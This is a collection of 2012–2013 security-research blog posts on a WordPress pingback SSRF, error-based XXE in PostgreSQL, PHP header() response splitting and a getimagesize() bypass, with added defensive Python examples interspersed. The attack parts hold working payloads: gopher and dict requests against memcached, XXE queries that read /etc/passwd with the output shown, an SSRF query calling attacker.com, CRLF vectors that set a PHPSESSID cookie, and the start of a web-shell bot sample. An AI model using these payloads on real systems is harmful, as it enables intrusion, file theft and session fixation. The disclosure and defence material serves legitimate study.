74 function wp_remote_get($url, $args = array()) {<br />
75 $objFetchSite = _wp_http_get_object();<br />
76 return $objFetchSite->get($url, $args);
...<br />
22 function &_wp_http_get_object() {<br />
23 static $http;<br />
24<br />
25 if ( is_null($http) )<br />
26 $http = new WP_Http();<br />
</code>
<br />
<code><br /></code>
<code>
./wp-includes/class-http.php:<br />
294 function get($url, $args = array()) {<br />
295 $defaults = array('method' => 'GET');<br />
296 $r = wp_parse_args( $args, $defaults );<br />
297 return $this->request($url, $r);<br />
298 }<br />
...
</code><br />
<code> 81 function request( $url, $args = array() ) {<br />
...<br />
191 return $this->_dispatch_request($url, $r);<br />
...<br />
243 private function _dispatch_request( $url, $args ) {<br />
244 static $transports = array();<br />
245<br />
246 $class = $this->_get_first_available_transport( $args, $url<br />
...<br />
205 public function _get_first_available_transport( $args, $url = null )<br />
206 $request_order = array( 'curl', 'streams', 'fsockopen' );</code><br />
Now you know that support for file://, gopher://, dict://, ldap:// and other schemes makes this bug really dangerous.<br />
It is easy to exploit local services and host-based auth via dict/gopher.<br />
<br />
Let's try to read data from the response. It may be a response with local file content (file://) or data from intranet services (http://wiki.internal.local, gopher://localhost:11211/1get%20secretkey%0aquit).<br />
<br />
Look at WP code again:<br />
<br />
<code>
./wp-includes/class-wp-xmlrpc-server.php:<br /> 4988 $linea = wp_remote_fopen( $pagelinkedfrom );<br /> 4989 if ( !$linea )<br /> ...<br /> 4999 preg_match('|<title>([^<]*?)</title>|is', $linea, $matchtitle);<br /> 5000 $title = $matchtitle[1];
<br /> 5001 if ( empty( $title ) )<br /> 5002 return new IXR_Error(32, __('We cannot find a title on that page.'));<br /> 5003<br /> 5004 $linea = strip_tags( $linea, '<a>' ); // just keep the tag we need<br /> 5005<br /> 5006 $p = explode( "\n\n", $linea );<br /> 5007<br /> 5008 $preg_target = preg_quote($pagelinkedto, '|');<br /> 5009 foreach ( $p as $para ) {<br /> 5010 if ( strpos($para, $pagelinkedto) !== false ) { // it exists, but is it a link?<br /> 5011 preg_match("|<a[^>]+?".$preg_target."[^>]*>([^>]+?)</a>|", $para, $context);<br /> 5012<br /> 5013 // If the URL isn't in a link context, keep looking<br /> 5014 if ( empty($context) )<br /> 5015 continue;</code><br />
<code> ...</code><br />
<code></code><br />
<code> 5019 $excerpt = preg_replace('|\</?wpcontext\>|', '', $para);</code><br />
<code> 5020 </code><br />
<code> 5021 // prevent really long link text</code><br />
<code> 5022 if ( strlen($context[1]) > 100 )</code><br />
<code> 5023 $context[1] = substr($context[1], 0, 100) . '...';</code><br />
<code>
</code>
<br />
Data between the "<title>" and "</title>" strings will be put into the author field of the comment (limited to 255 bytes by the DB field).<br />
Data between the "<a >" and "</a>" strings will be put into the content field of the comment (limited to 100 bytes by line 5022).<br />
<br />
Now it is clear that you can read 355 bytes of arbitrary data.<br />
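On the defending side, the schemes, ports and intranet hosts listed above are exactly what a pingback handler must filter out before the URL ever reaches the curl/streams/fsockopen transport. The Python function below is an added example, not WordPress code: it allows only http/https, no userinfo, the default web ports, and hosts whose every resolved address is globally routable. The resolver is injectable; the names and addresses in _CONSTRUCTED_DNS are made up for the offline demo.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def is_safe_fetch_url(url, resolve=socket.gethostbyname_ex):
    """Return True only for URLs a pingback handler may fetch.

    Added example, not WordPress code. The filtering happens before the URL
    reaches the HTTP transport:
      * only http/https, so curl never sees file://, gopher://, dict://, ldap://;
      * no userinfo and only the default web ports, which removes the
        port-scanning use of the pingback;
      * every address the host resolves to must be globally routable, which
        blocks localhost, RFC 1918 intranet hosts and link-local addresses.
    `resolve` has the socket.gethostbyname_ex signature (IPv4 only; a
    production version would use getaddrinfo) and is injectable so the check
    can be tested offline.
    """
    try:
        parts = urlsplit(url)
        port = parts.port            # raises ValueError on a garbage port
    except ValueError:
        return False
    if parts.scheme.lower() not in ("http", "https"):
        return False
    host = parts.hostname
    if not host or parts.username is not None or parts.password is not None:
        return False
    if port not in (None, 80, 443):
        return False
    # IP literals are checked directly; names go through the resolver.
    try:
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            addrs = resolve(host)[2]
        except OSError:
            return False
    if not addrs:
        return False
    # Every answer must be global. The fetch itself should then connect to
    # one of these exact addresses rather than resolve again (DNS rebinding).
    return all(ipaddress.ip_address(a).is_global for a in addrs)


# Constructed DNS answers for the offline demo (not real hosts).
_CONSTRUCTED_DNS = {
    "blog.example": ["93.184.216.34"],
    "wiki.internal.local": ["10.0.0.5"],
    "localhost": ["127.0.0.1"],
}


def fake_resolve(host):
    """Stand-in for socket.gethostbyname_ex backed by _CONSTRUCTED_DNS."""
    if host not in _CONSTRUCTED_DNS:
        raise socket.gaierror(-2, "Name or service not known")
    return host, [], list(_CONSTRUCTED_DNS[host])


def demo():
    """Evaluate the schemes and targets mentioned in the post."""
    urls = [
        "http://blog.example/2013/01/post/",
        "file:///etc/passwd",
        "gopher://localhost:11211/1stats",
        "dict://localhost:11211/stats",
        "http://wiki.internal.local/",
        "http://127.0.0.1:80/",
        "http://[::1]/",
        "http://user@blog.example/",
        "http://blog.example:8080/",
        "http://does-not-resolve.example/",
    ]
    return {u: is_safe_fetch_url(u, fake_resolve) for u in urls}


if __name__ == "__main__":
    for url, ok in demo().items():
        print("allow" if ok else "block", url)
```

Only the first URL passes; everything else in the list is blocked by the scheme, port, userinfo or address rule. Note the last comment: validating the name and then letting the HTTP client resolve it a second time reopens the hole via DNS rebinding, so the fetch should pin the checked address.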
<br />
Let's try to read data from <b>access.log</b>.<br />
First, inject markers into access.log with the following requests:<br />
http://localhost/tests/wordpress/#<title><br />
http://localhost/tests/wordpress/#</title><br />
http://localhost/tests/wordpress/#<a http://localhost/tests/wordpress/?p=1><br />
http://localhost/tests/wordpress/#</a><br />
<br />
Send the requests with markers as manually crafted HTTP packets like this (browsers send HTTP requests without the fragment part):<br />
<code>
GET /tests/wordpress/#<a>marker1 HTTP/1.1<br />
Host: localhost<br />
</code>
<br />
<div>
Now you can add a comment with arbitrary data between your markers using a simple XMLRPC request (see slides 20-23 of our presentation about the ProcFS way to read access.log):</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Ga3IJpGOW6aYeZ_p8D2qEVnFgJSaHvLr5ySRKwt7JYG4yYe3h9GTFf66nHZoHc_bq9U1e5h7yA66ANuvyZpGRCr8d-6N_NxUmD_nScxUTYgy9HuzLRHcb35NsDCR6b2fZVzEuJVRiSk/s1600/wp-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Ga3IJpGOW6aYeZ_p8D2qEVnFgJSaHvLr5ySRKwt7JYG4yYe3h9GTFf66nHZoHc_bq9U1e5h7yA66ANuvyZpGRCr8d-6N_NxUmD_nScxUTYgy9HuzLRHcb35NsDCR6b2fZVzEuJVRiSk/s640/wp-1.png" width="640" /></a></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh13LrfldXtg1pUzkc5P3nUyi8eFS04NTGYWJTeOVVZEjluDbV4qm1_nmtPW-lUmKd5g96V7MrQ8MBw-YtvKRBX4S2RRlLzOq4Vlv4rU2N-2Q-vGidzM54-Ttu5O1omSngYVGstZlgs3C8/s1600/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA+%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0+2013-01-05+%25D0%25B2+5.43.38.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="535" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh13LrfldXtg1pUzkc5P3nUyi8eFS04NTGYWJTeOVVZEjluDbV4qm1_nmtPW-lUmKd5g96V7MrQ8MBw-YtvKRBX4S2RRlLzOq4Vlv4rU2N-2Q-vGidzM54-Ttu5O1omSngYVGstZlgs3C8/s640/%25D0%25A1%25D0%25BD%25D0%25B8%25D0%25BC%25D0%25BE%25D0%25BA+%25D1%258D%25D0%25BA%25D1%2580%25D0%25B0%25D0%25BD%25D0%25B0+2013-01-05+%25D0%25B2+5.43.38.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
For fun, reading the output of the memcached <b>stats</b> command:
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXRw8Bnl-gm6kddF0y7EuaaT5idKhmPpcC7L8wyTlP0mQkMNyyURKjpa0eFrbb1t54mRlyneuRg9wVafPzNk4YvumwkNcVqgA2WVyTcU4i91Zw4mXuBmKXFPDO_Udy9GyrgGUBT7ubfDM/s1600/ssrf-5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXRw8Bnl-gm6kddF0y7EuaaT5idKhmPpcC7L8wyTlP0mQkMNyyURKjpa0eFrbb1t54mRlyneuRg9wVafPzNk4YvumwkNcVqgA2WVyTcU4i91Zw4mXuBmKXFPDO_Udy9GyrgGUBT7ubfDM/s640/ssrf-5.png" width="640" /></a></div>
<br /></div>
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com139tag:blogger.com,1999:blog-7173843122198586393.post-65462234612392142192012-12-20T10:26:00.004-08:002012-12-20T10:28:36.837-08:00Advanced mobile UI redressing attacks using gyroscope/accelerometer<div dir="ltr" style="text-align: left;" trbidi="on">
When you hold a mobile phone in your hand and put your finger on the screen area where you want to tap, you move the phone a little.<br />
<div>
<br /></div>
<div>
These deviations can be measured with the built-in gyroscope and accelerometer and used for a UI-redressing attack.</div>
<div>
<br /></div>
<div>
You probably won't react in time to lift your finger while pressing the screen, even if you see some other graphic object (such as a window or button) appear in the area where you are about to press.<br />
<br />
Funny video:</div>
<div>
<a href="http://goanimate.com/videos/0qD3CQgMX-qY?utm_source=embed&uid=0dfqhWC0Xpmc" target="_blank">Advanced mobile UI redressing attack</a> by <a href="http://goanimate.com/user/0dfqhWC0Xpmc" target="_blank">d0znpp</a> on <a href='http://goanimate.com?utm_source=embed' target="_blank">GoAnimate</a>
</div>
</div>Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com456tag:blogger.com,1999:blog-7173843122198586393.post-112848865425183222012-10-04T00:14:00.001-07:002012-10-04T01:27:48.860-07:00Error-based XXE exploitation trick<div dir="ltr" style="text-align: left;" trbidi="on">
Exploiting XXE vulnerabilities is difficult when you cannot view the resulting XML document.<br />
<br />
The recent <a href="http://lab.onsec.ru/2012/06/postgresql-all-error-based-xxe-0day.html">Postgres XXE</a> vulnerability is a good example of this: entities are resolved but not added to the XML output. This is a common case in the wild.<br />
<br />
We bring to your attention an easy trick which allows reading the first and last lines of ASCII files (which cannot be read by the classic XXE attack vector, as in the error-based case):<br />
<br />
<blockquote class="tr_bq">
<!DOCTYPE [<br />
<!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes also /dev/null --><br />
<!ENTITY wanttoread SYSTEM "/etc/hostname" ><br />
]><br />
<!-- read first line of file using error-based XXE --><br />
<root><br />
&malformed; &wanttoread;<br />
</root></blockquote>
<br />
<blockquote class="tr_bq">
<!DOCTYPE [<br />
<!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes /dev/null --><br />
<!ENTITY wanttoread SYSTEM "/etc/hostname" ><br />
]><br />
<!-- read last line of file using error-based XXE --><br />
<root><br />
&wanttoread; &malformed;<br />
</root></blockquote>
<br />
In the error message you will see something like this:<br />
<blockquote class="tr_bq">
ERROR: hostnamestr<br />
^<br />
didn't parse (line: 1 pos: 13)</blockquote>
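On the consuming side, the defence against both ordinary and error-based XXE is the same: do not let the parser fetch external entities at all, and do not echo the parser's error text (which, as shown above, carries a line of the file) back to the caller. The Python function below is an added example, not code from this post or from PostgreSQL; it configures the standard-library SAX parser that way. ATTACK_DOC is a constructed document shaped like the first payload above, with a nonexistent path in place of /etc/hostname, so nothing would be read even by a misconfigured parser.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes


class _TextCollector(ContentHandler):
    """Collects character data; entity content would land here if expanded."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_untrusted_xml(data):
    """Parse XML from an untrusted source and return its text content.

    Added example. Two defences map onto the trick described above:
      * external general and parameter entities are disabled, so SYSTEM
        entities such as /dev/urandom or /etc/hostname are never opened
        (recent Python versions default to this; older ones did not);
      * parser errors are reduced to a position, so the error message can
        never carry a line of a local file back to the caller.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    try:
        parser.parse(io.BytesIO(data))
    except xml.sax.SAXParseException as exc:
        raise ValueError(
            "invalid XML at line %d, column %d"
            % (exc.getLineNumber(), exc.getColumnNumber())
        ) from None
    return "".join(handler.chunks)


# Constructed document in the shape of the first payload above. The SYSTEM
# path is deliberately nonexistent.
ATTACK_DOC = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE root [<!ENTITY wanttoread SYSTEM "/nonexistent/constructed/hostname">]>'
    b'<root>first&wanttoread;last</root>'
)


def demo():
    """Show that the entity is skipped and that errors carry no content."""
    error = None
    try:
        parse_untrusted_xml(b"<root>unclosed")
    except ValueError as exc:
        error = str(exc)
    return {"text": parse_untrusted_xml(ATTACK_DOC), "error": error}


if __name__ == "__main__":
    print(demo())
```

With external entities disabled, &wanttoread; contributes nothing and the text comes back as "firstlast"; the malformed document produces only a line and column, never the offending bytes.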
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com36tag:blogger.com,1999:blog-7173843122198586393.post-70616623725639101202012-08-23T16:20:00.000-07:002012-08-23T16:35:20.286-07:00PHP multiple headers bypass available again<div dir="ltr" style="text-align: left;" trbidi="on">
Recently we <a href="http://www.slideshare.net/d0znpp/smuggling-splitting-poisoning-zeronights-onsec">wrote about a universal PHP bypass for the header() function</a>.<br />
That trick is based on a %0d byte instead of %0d%0a to split the HTTP response.<br />
The bug was fixed, as you can see in the changelog:<br />
<a href="http://php.net/ChangeLog-5.php">http://php.net/ChangeLog-5.php</a><br />
<blockquote class="tr_bq">
<blockquote>
<b>Version 5.3.11</b> </blockquote>
</blockquote>
<blockquote class="tr_bq">
<blockquote>
Fixed bug <a href="https://bugs.php.net/bug.php?id=60227">#60227</a> (header() cannot detect the multi-line header with CR). </blockquote>
</blockquote>
<a href="https://bugs.php.net/bug.php?id=60227">https://bugs.php.net/bug.php?id=60227</a> is the original bug report.<br />
And what about the fix?<br />
<br />
<blockquote class="tr_bq">
for (i = 0; i < header_line_len; i++) {<br />
/* RFC 2616 allows new lines if followed by SP or HT */<br />
int illegal_break =<br />
<span style="color: red;"> (header_line[i+1] != ' ' && header_line[i+1] != '\t')</span> && (<br />
header_line[i] == '\n'<br />
|| (header_line[i] == '\r' && header_line[i+1] != '\n'));</blockquote>
<div>
Pay attention to the red line.</div>
<br />
And as we wrote before, the bug is still exploitable in Internet Explorer.<br />
<br />
Source code:<br />
<blockquote class="tr_bq">
<?php<br />
header("Location: /?asd".$_GET['r']);<br />
?></blockquote>
Attack vectors:<br />
GET /?r=split<span style="color: red;">%0d+</span>Set-cookie:PHPSESSID=predicated HTTP/1.1<br />
<br />
GET /?r=split<span style="color: red;">%0d%20</span>Set-cookie:PHPSESSID=predicated HTTP/1.1<br />
<br />
GET /?r=split<span style="color: red;">%0d%09</span>Set-cookie:PHPSESSID=predicated HTTP/1.1<br />
<br />
GET /?r=split<span style="color: red;">%0d%0a+</span>Set-cookie:PHPSESSID=predicated HTTP/1.1<br />
<br />
GET /?r=split<span style="color: red;">%0d%0a%20</span>Set-cookie:PHPSESSID=predicated HTTP/1.1<br />
<br />
GET /?r=split<span style="color: red;">%0d%0a%09</span>Set-cookie:PHPSESSID=predicated HTTP/1.1</div>
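To see why the red line matters, the PHP check can be reproduced and run against the six vectors. The Python below is an added example, not PHP's own code: php_5311_illegal_break() is a literal port of the loop quoted above (it assumes, as the post does, that an illegal break makes header() refuse the line), and strict_illegal_break() is the rule a hardened application should apply instead, rejecting any control character in a header value. evaluate() decodes each vector the way $_GET does and runs both checks on the resulting Location header.

```python
from urllib.parse import unquote_plus

# The six request vectors from the post, exactly as they arrive in $_GET['r'].
VECTORS = [
    "split%0d+Set-cookie:PHPSESSID=predicated",
    "split%0d%20Set-cookie:PHPSESSID=predicated",
    "split%0d%09Set-cookie:PHPSESSID=predicated",
    "split%0d%0a+Set-cookie:PHPSESSID=predicated",
    "split%0d%0a%20Set-cookie:PHPSESSID=predicated",
    "split%0d%0a%09Set-cookie:PHPSESSID=predicated",
]


def php_5311_illegal_break(header_line):
    """Port of the PHP 5.3.11 loop quoted above.

    Assumed, as in the post: an illegal break makes header() refuse the line.
    Follows the C literally, including the read of header_line[i+1] on the
    last byte, which in C is the NUL terminator. Returns True when the
    header would be refused.
    """
    n = len(header_line)
    for i in range(n):
        cur = header_line[i]
        nxt = header_line[i + 1] if i + 1 < n else "\0"
        # RFC 2616 line folding: a break followed by SP or HT is accepted.
        illegal_break = (nxt != " " and nxt != "\t") and (
            cur == "\n" or (cur == "\r" and nxt != "\n")
        )
        if illegal_break:
            return True
    return False


def strict_illegal_break(header_line):
    """Defensive rule: reject any control character, CR and LF included.

    Header folding is obsolete (RFC 7230 section 3.2.4) and some clients
    treat a bare CR as a line terminator, so a value taken from a request
    parameter must never be allowed to contain one.
    """
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in header_line)


def evaluate(vectors=VECTORS):
    """Map each vector to (refused_by_php_5311, refused_by_strict_rule)."""
    results = {}
    for v in vectors:
        # header("Location: /?asd".$_GET['r']) with PHP's query decoding
        header = "Location: /?asd" + unquote_plus(v)
        results[v] = (php_5311_illegal_break(header), strict_illegal_break(header))
    return results


if __name__ == "__main__":
    for vector, (php_refuses, strict_refuses) in evaluate().items():
        print(f"{vector:50} php5.3.11={php_refuses} strict={strict_refuses}")
```

Every one of the six vectors comes back as (False, True): the patched PHP loop lets the CR through because the next byte is SP or HT, while the strict rule refuses all of them. A plain CRLF split is refused by both.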
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com14tag:blogger.com,1999:blog-7173843122198586393.post-80403203200180660212012-06-01T04:12:00.002-07:002012-06-02T01:41:58.638-07:00PostgreSQL (all) error-based XXE 0day<div dir="ltr" style="text-align: left;" trbidi="on">
Recently we found a PostgreSQL 0day error-based XXE vulnerability and published it at <a href="http://phdays.com/">PHDays</a>.<br />
Currently it may be used by an attacker to read parts of local files and to make requests from the DB server to the intranet (SSRF, Server Side Request Forgery).<br />
<br />
Example:<br />
DoS:<br />
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')<br />
<br />
SSRF:<br />
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')<br />
<br />
Error-based XXE:<br />
<br />
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');<br />
<br />
<blockquote class="tr_bq">
ERROR: invalid XML document<br />
DETAILS: /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name<br />
<span style="color: red;"><span class="Apple-tab-span" style="white-space: pre;"> </span>exec 9<&0 </etc/fstab</span><span class="Apple-tab-span" style="white-space: pre;"> </span> ^<br />
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name<br />
<span style="color: red;"><span class="Apple-tab-span" style="white-space: pre;"> </span>exec 9<&0 </etc/fstab</span><span class="Apple-tab-span" style="white-space: pre;"> </span> ^<br />
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced<br />
<span style="color: red;"><span class="Apple-tab-span" style="white-space: pre;"> </span>exec 9<&0 </etc/fstab</span><span class="Apple-tab-span" style="white-space: pre;"> </span> ^<br />
Entity: line 1: parser error : Failure to process entity abc<br />
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;<br />
^<br />
Entity: line 1: parser error : Entity 'abc' not defined<br />
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc; ^</blockquote>
<b><span style="color: red;">UPDATE!</span></b><br />
Classical XXE via XSLT transformation was also found.<br />
Reading any data is also possible:<br />
<br />
<br />
SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*"> <xsl:element name="samples"> <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element> </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);<br />
<blockquote class="tr_bq">
xslt_process <br />
-----------------------------------------------------------------------------------------<br />
<?xml version="1.0"?><br />
<samples><sample>root:x:0:0:root:/root:/bin/bash<br />
daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />
bin:x:2:2:bin:/bin:/bin/sh<br />
sys:x:3:3:sys:/dev:/bin/sh<br />
sync:x:4:65534:sync:/bin:/bin/sync<br />
games:x:5:60:games:/usr/games:/bin/sh<br />
man:x:6:12:man:/var/cache/man:/bin/sh<br />
lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />
mail:x:8:8:mail:/var/mail:/bin/sh<br />
news:x:9:9:news:/var/spool/news:/bin/sh<br />
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />
proxy:x:13:13:proxy:/bin:/bin/sh<br />
www-data:x:33:33:www-data:/var/www:/bin/sh<br />
backup:x:34:34:backup:/var/backups:/bin/sh<br />
list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />
irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br />
libuuid:x:100:101::/var/lib/libuuid:/bin/sh<br />
nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false<br />
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin<br />
puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false<br />
Debian-exim:x:111:115::/var/spool/exim4:/bin/false<br />
alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash<br />
oxod:x:1001:1001:,,,:/home/oxod:/bin/bash<br />
mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false<br />
postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash<br />
oracle:x:1002:1002::/u01/app/oracle:/bin/bash<br />
</sample></samples><br />
<br />
(1 row)</blockquote>
<div>
<br /></div>
</div>Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com20tag:blogger.com,1999:blog-7173843122198586393.post-63172358516424082532012-05-26T10:14:00.002-07:002012-05-27T02:50:14.547-07:00PHP all getimage() bypass<div dir="ltr" style="text-align: left;" trbidi="on">
Many PHP projects have image validation based on the getimagesize() function:<br />
<a href="http://php.net/manual/ru/function.getimagesize.php">http://php.net/manual/ru/function.getimagesize.php</a><br />
<br />
That function has a bug which lets an attacker pass files in the <a href="http://en.wikipedia.org/wiki/Berkeley_DB">Berkeley DB</a> format, and other files starting with 0x00 (a null byte), as images.<br />
<br />
<?php<br />
if(<b>getimagesize</b>("/etc/aliases.db")){<br />
echo "OK";<br />
}<br />
?><br />
#php -f gis-test.php<br />
OK<br />
<br />
On *BSD systems and MacOS, Berkeley DB files are used as configs.<br />
This may be used by an attacker to bypass image checks based on getimagesize().<br />
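What a stricter check looks like: the Python function below is an added example, not PHP's getimagesize() and not a replacement for it. It accepts a file only when the first bytes are a known PNG, GIF or JPEG signature and then reads the dimensions from the header, so a file starting with a null byte is rejected outright. The sample blobs are constructed minimal headers, not real images.

```python
import struct


def sniff_image(data):
    """Return (type, width, height) for PNG, GIF or JPEG bytes, else None.

    Added example, not PHP's getimagesize(): a file is accepted only if it
    starts with a known image signature, so a Berkeley DB file (or anything
    else beginning with a null byte) is rejected instead of being reported
    as an image. Dimensions come from the PNG IHDR chunk, the GIF logical
    screen descriptor, or the first JPEG SOF0/SOF1/SOF2 frame header.
    """
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        if len(data) < 24 or data[12:16] != b"IHDR":
            return None
        width, height = struct.unpack(">II", data[16:24])
        return ("png", width, height)
    if data[:6] in (b"GIF87a", b"GIF89a"):
        if len(data) < 10:
            return None
        width, height = struct.unpack("<HH", data[6:10])
        return ("gif", width, height)
    if data.startswith(b"\xff\xd8"):
        return _jpeg_frame(data)
    return None


def _jpeg_frame(data):
    """Walk JPEG segments until a SOF marker yields the frame size."""
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            return None                 # lost sync: not a well-formed stream
        marker = data[i + 1]
        if marker == 0xFF:
            i += 1                      # fill byte
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD9:
            i += 2                      # standalone markers carry no length
            continue
        if i + 4 > len(data):
            return None
        seg_len = struct.unpack(">H", data[i + 2:i + 4])[0]
        if marker in (0xC0, 0xC1, 0xC2):
            if i + 9 > len(data):
                return None
            height, width = struct.unpack(">HH", data[i + 5:i + 9])
            return ("jpeg", width, height)
        i += 2 + seg_len
    return None


# Constructed samples: minimal headers, not real images.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0d" + b"IHDR" + struct.pack(">II", 1, 1)
GIF_SAMPLE = b"GIF89a" + struct.pack("<HH", 10, 20) + b"\x00\x00\x00"
JPEG_SAMPLE = (
    b"\xff\xd8"                                                           # SOI
    + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00" + b"\x00" * 9     # APP0
    + b"\xff\xc0" + struct.pack(">H", 17) + b"\x08"                       # SOF0, 8 bits
    + struct.pack(">HH", 480, 640) + b"\x03" + b"\x00" * 9                # height, width, components
)
NULL_LED_SAMPLE = b"\x00" * 16 + b"constructed stand-in for a Berkeley DB file"


def demo():
    samples = [("png", PNG_SAMPLE), ("gif", GIF_SAMPLE),
               ("jpeg", JPEG_SAMPLE), ("null_led", NULL_LED_SAMPLE)]
    return {name: sniff_image(blob) for name, blob in samples}


if __name__ == "__main__":
    print(demo())
```

Even a signature check only validates the header; an upload handler should still re-encode the image with GD or ImageMagick so that whatever follows the header is discarded.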
<br />
We used that trick in the <a href="http://phdays.com/program/contests/#6317">PHD pre-hackquest (Blow Up the Town)</a> task called Tretyakovskaya.<br />
It was successfully found by the participants listed below:<br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">rdot.org</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">shr</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">AVictor</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">Antichat</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">MERRON</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">letm</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">sc2tv</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">DarkByte</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">ei-grad</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">vos</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">korvin</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">grixa</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">n0ne</span><br />
<span style="background-color: #333333; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">Endragor</span><br />
<span style="background-color: black; color: white; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 12px;">tiger</span><br />
Greetz, guys!</div>Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com12tag:blogger.com,1999:blog-7173843122198586393.post-42415719079077881392012-04-17T01:36:00.000-07:002012-04-17T01:36:12.068-07:00Find new web bot [Jembot]<div dir="ltr" style="text-align: left;" trbidi="on">We have discovered a new kind of bot that spreads in the form of web shells, called <b>Jembot</b>.<br />
Source code:<br />
<br />
<blockquote class="tr_bq"><?php<br />
if(isset($_GET['jembot']))<br />
{<br />
